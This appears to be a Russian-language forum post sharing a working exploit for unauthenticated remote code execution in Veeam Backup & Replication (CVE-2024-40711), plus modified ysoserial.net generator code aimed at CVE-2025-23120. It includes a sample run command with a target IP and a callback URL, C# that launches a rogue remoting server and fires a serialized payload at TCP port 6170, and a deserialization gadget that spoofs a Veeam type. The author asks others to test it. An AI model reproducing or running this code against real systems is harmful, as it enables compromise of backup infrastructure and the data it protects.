Код:
PS C:\Users\mz\Desktop\CVE-2024-40711-main\CVE-2024-40711-poc> C:\Users\mz\Desktop\CVE-2024-40711-main\CVE-2024-40711-po
c\ysoserial\bin\Debug\ysoserial.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.1
68.201.158
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]
CVE-2024-40711
Первый линк к изучению:
Оригинальный исходник с гитхаб:
Собранный сурс со всеми зависимостями и dll:
(вариант запуска выше); CVE-2025-23120
Второй линк : CVE-2025-23120 -
Исправления для VeeamGenerator.cs
Код:
using Newtonsoft.Json.Linq;
using Polenter.Serialization.Core;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Runtime.Serialization;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using Veeam.Backup.Core;
using Veeam.Backup.Model;
using ysoserial.Helpers;
namespace ysoserial.Generators
{
// ysoserial.net generator for CVE-2024-40711 (Veeam Backup & Replication).
// Unlike most generators in this project, Generate() does not only build bytes:
// it spawns two external helper executables and points them at the host given in
// InputArgs.TargetVeeamIP, so calling it has process and network side effects.
public class VeeamGenerator : GenericGenerator
{
    // Credit string shown in the generator listing.
    public override string Finders()
    {
        return "friday the 13th";
    }

    /// <summary>
    /// Builds the nested CDbCryptoKeyInfoWrapper payload and launches the two helper
    /// processes. Expects ExploitRemotingService.exe, RogueRemotingServer.exe and
    /// exploit.soapformatter relative to the current working directory; when any of
    /// them is missing the whole process exits with code 1 instead of throwing.
    /// </summary>
    /// <param name="formatter">ysoserial formatter name; compared case-insensitively.</param>
    /// <param name="inputArgs">Cmd is forwarded to RogueRemotingServer, TargetVeeamIP to ExploitRemotingService.</param>
    /// <returns>
    /// Declared as the serialized payload, but see the Environment.Exit call below:
    /// the formatter dispatch after it is never reached.
    /// </returns>
    /// <exception cref="Exception">Would be thrown for formatters other than
    /// BinaryFormatter, LosFormatter and SoapFormatter (unreachable in practice).</exception>
    public override object Generate(string formatter, InputArgs inputArgs)
    {
        // Verbatim multi-line string; its content lines are part of the literal and
        // must stay exactly as written, including the closing quote at column 0.
        string banner = @"
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
";
        string banner2 = @"
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]
";
        Console.WriteLine(banner);
        Console.WriteLine(banner2);

        // Helper binaries and the SOAP payload file are resolved relative to the
        // working directory, not to the location of ysoserial.exe.
        string tool_path_ExploitRemoting = @".\ExploitRemotingService\ExploitRemotingService.exe";
        string tool_path_RogueRemoting = @".\RogueRemotingServer\RogueRemotingServer.exe";
        string rogueremoting_payload_filename = @"exploit.soapformatter";
        if (!File.Exists(tool_path_ExploitRemoting))
        {
            Console.WriteLine($"[!] Following tool needs to be present {tool_path_ExploitRemoting}");
            System.Environment.Exit(1);
        }
        if (!File.Exists(tool_path_RogueRemoting))
        {
            Console.WriteLine($"[!] Following tool needs to be present {tool_path_RogueRemoting}");
            System.Environment.Exit(1);
        }
        if (!File.Exists(rogueremoting_payload_filename))
        {
            Console.WriteLine($"[!] required payload is not present");
            System.Environment.Exit(1);
        }

        // Inner payload: a DataSetTypeSpoof blob, base64-encoded and carried as the
        // single element of the wrapper's RepairRecs string array.
        //ObjRefGenerator gen = new ObjRefGenerator();
        DataSetTypeSpoofGenerator gen = new DataSetTypeSpoofGenerator();
        CDbCryptoKeyInfoWrapper payload = new CDbCryptoKeyInfoWrapper(new string[] { Convert.ToBase64String((byte[])gen.Generate(formatter, inputArgs) ) });

        // First helper: RogueRemotingServer, started visibly (CreateNoWindow = false)
        // and never waited on or disposed here.
        ProcessStartInfo rogueRemoting = new ProcessStartInfo
        {
            FileName = tool_path_RogueRemoting,
            Arguments = @"--wrapSoapPayload " + inputArgs.Cmd + " " + rogueremoting_payload_filename,
            UseShellExecute = false,
            CreateNoWindow = false
        };
        Process.Start(rogueRemoting);

        // Second helper: ExploitRemotingService against the .NET Remoting endpoint on
        // TCP 6170 (PermanentSessionService). Defender's note: that port should not
        // be reachable from untrusted networks, and the vendor patch for
        // CVE-2024-40711 is the actual fix. stdout/stderr are redirected but never
        // read, so the child's output is simply dropped.
        ProcessStartInfo exploitRemoting = new ProcessStartInfo
        {
            FileName = tool_path_ExploitRemoting,
            // I know
            Arguments = @"-s tcp://" + inputArgs.TargetVeeamIP + @":6170/PermanentSessionService raw " + Convert.ToBase64String((byte[])Serialize(payload, formatter, inputArgs)),
            UseShellExecute = false,
            RedirectStandardOutput = true,
            RedirectStandardError = true,
            CreateNoWindow = true
        };
        Process.Start(exploitRemoting);

        // Unconditional exit: everything below this line is unreachable (CS0162).
        System.Environment.Exit(1);
        if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
            || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
            || formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
        {
            return Serialize(payload, formatter, inputArgs);
        }
        else
        {
            throw new Exception("Formatter not supported");
        }
    }

    public override string Name()
    {
        return "Veeam";
    }

    // ObjectStateFormatter is advertised here but Generate() would reject it.
    public override List<string> SupportedFormatters()
    {
        return new List<string> { "BinaryFormatter", "SoapFormatter", "ObjectStateFormatter", "LosFormatter" };
    }

    /// <summary>
    /// ISerializable surrogate. On serialization it rewrites the record's type to
    /// Veeam's CDbCryptoKeyInfo and emits placeholder values under names that
    /// presumably mirror that type's serialized members (not verifiable here);
    /// the caller-supplied string array is written as RepairRecs.
    /// </summary>
    [Serializable]
    public class CDbCryptoKeyInfoWrapper : ISerializable
    {
        private string[] _fakeList;

        public CDbCryptoKeyInfoWrapper(string[] _fakeList)
        {
            this._fakeList = _fakeList;
        }

        public void GetObjectData(SerializationInfo info, StreamingContext context)
        {
            info.SetType(typeof(CDbCryptoKeyInfo));
            // Fresh random Id on every serialization, so two runs never produce
            // byte-identical output.
            info.AddValue("Id", Guid.NewGuid());
            info.AddValue("KeySetId", null);
            info.AddValue("KeyType", 1);
            info.AddValue("Hint", "aaaaa");
            info.AddValue("DecryptedKeyValue", "AAAA");
            // 0x409 = en-US LCID.
            info.AddValue("LocaleLCID", 0x409);
            info.AddValue("ModificationDateUtc", new DateTime());
            info.AddValue("CryptoAlg", 1);
            info.AddValue("RepairRecs", _fakeList);
        }
    }
}
}
Исправления для DataSetTypeSpoofGenerator.cs
Код:
using System;
using System.Collections.Generic;
using System.Data;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using ysoserial.Helpers;
namespace ysoserial.Generators
{
// DataSet type-spoofing generator (see the Forshaw paper referenced below).
// The variant in this post differs from upstream ysoserial.net only in the
// DataSetSpoofMarshal it wraps, which carries a Veeam type name instead of DataSet.
public class DataSetTypeSpoofGenerator : DataSetGenerator
{
    public override string Name()
    {
        return "DataSetTypeSpoof";
    }

    public override string Contributors()
    {
        return "Soroush Dalili, Markus Wulftange, Jang";
    }

    public override string AdditionalInfo()
    {
        return "A more advanced type spoofing which can use any arbitrary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson or in the DataSetOldBehaviour gadget";
    }

    // Only a BinaryFormatter blob can be bridged in as the inner payload.
    public override string SupportedBridgedFormatter()
    {
        return Formatters.BinaryFormatter;
    }

    /// <summary>
    /// Wraps an inner BinaryFormatter payload in a DataSetSpoofMarshal and
    /// serializes it with the requested formatter.
    /// </summary>
    /// <param name="formatter">Formatter name; compared case-insensitively.</param>
    /// <param name="inputArgs">Forwarded to the inner generator and to Serialize.</param>
    /// <returns>The serialized DataSetSpoofMarshal.</returns>
    /// <exception cref="Exception">Thrown for any formatter other than
    /// BinaryFormatter, LosFormatter and SoapFormatter.</exception>
    public override object Generate(string formatter, InputArgs inputArgs)
    {
        // A bridged payload (set by the caller on the base class) is used as-is;
        // otherwise the inner blob is generated here without the usual test run.
        byte[] binaryFormatterPayload;
        if (BridgedPayload != null)
        {
            binaryFormatterPayload = (byte[])BridgedPayload;
        }
        else
        {
            binaryFormatterPayload = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
        }
        DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(binaryFormatterPayload);
        if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
            || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
            || formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
        {
            return Serialize(payloadDataSetMarshal, formatter, inputArgs);
        }
        else
        {
            throw new Exception("Formatter not supported");
        }
    }
}
// https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
/// <summary>
/// ISerializable surrogate that emits a DataSet-shaped record under a spoofed
/// type name. The commented-out lines in GetObjectData show the upstream
/// System.Data.DataSet naming that this post's version replaces with a
/// Veeam.Backup.EsxManager type; the remaining entries follow DataSet's
/// binary remoting layout, with the inner BinaryFormatter blob as the single table.
/// </summary>
[Serializable]
public class DataSetSpoofMarshal : ISerializable
{
    // Inner BinaryFormatter payload written as DataSet.Tables_0.
    byte[] _fakeTable;

    public void GetObjectData(SerializationInfo info, StreamingContext context)
    {
        // info.SetType(typeof(System.Data.DataSet));
        //info.AssemblyName = "mscorlib";
        //info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName;
        // Assembly name and type are set directly rather than via SetType(), since
        // the named Veeam type is not referenced by this project. The version and
        // public key token are hard-coded; presumably they must match the target
        // build — TODO confirm against a real install (the post's author notes the
        // code is untested).
        info.AssemblyName = "Veeam.Backup.EsxManager, Version=12.3.0.0, Culture=neutral, PublicKeyToken=bfd684de2276783a";
        info.FullTypeName = "Veeam.Backup.EsxManager.xmlFrameworkDs";
        info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
        info.AddValue("DataSet.DataSetName", "");
        info.AddValue("DataSet.Namespace", "");
        info.AddValue("DataSet.Prefix", "");
        info.AddValue("DataSet.CaseSensitive", false);
        // 0x409 = en-US LCID.
        info.AddValue("DataSet.LocaleLCID", 0x409);
        info.AddValue("DataSet.EnforceConstraints", false);
        info.AddValue("DataSet.ExtendedProperties", (System.Data.PropertyCollection) null);
        info.AddValue("DataSet.Tables.Count", 1);
        info.AddValue("DataSet.Tables_0", _fakeTable);
    }

    public void SetFakeTable(byte[] bfPayload)
    {
        _fakeTable = bfPayload;
    }

    // Takes an already-serialized BinaryFormatter blob verbatim.
    public DataSetSpoofMarshal(byte[] bfPayload)
    {
        SetFakeTable(bfPayload);
    }

    public DataSetSpoofMarshal(object fakeTable) : this(fakeTable, new InputArgs())
    {
        // This won't use anything we might have defined in ysoserial.net BinaryFormatter process (such as minification)
    }

    // Serializes an arbitrary object into the inner blob, using the project's
    // modified BinaryFormatter when minification is requested.
    public DataSetSpoofMarshal(object fakeTable, InputArgs inputArgs)
    {
        MemoryStream stm = new MemoryStream();
        if (inputArgs.Minify)
        {
            ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal =
                new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
            fmtLocal.Serialize(stm, fakeTable);
        }
        else
        {
            BinaryFormatter fmt = new BinaryFormatter();
            fmt.Serialize(stm, fakeTable);
        }
        SetFakeTable(stm.ToArray());
    }

    // Copies the stream's full contents regardless of its current position.
    public DataSetSpoofMarshal(MemoryStream ms)
    {
        SetFakeTable(ms.ToArray());
    }
}
}
Код требует дополнительных тестов и обратной связи; у меня, к сожалению, не нашлось стендов.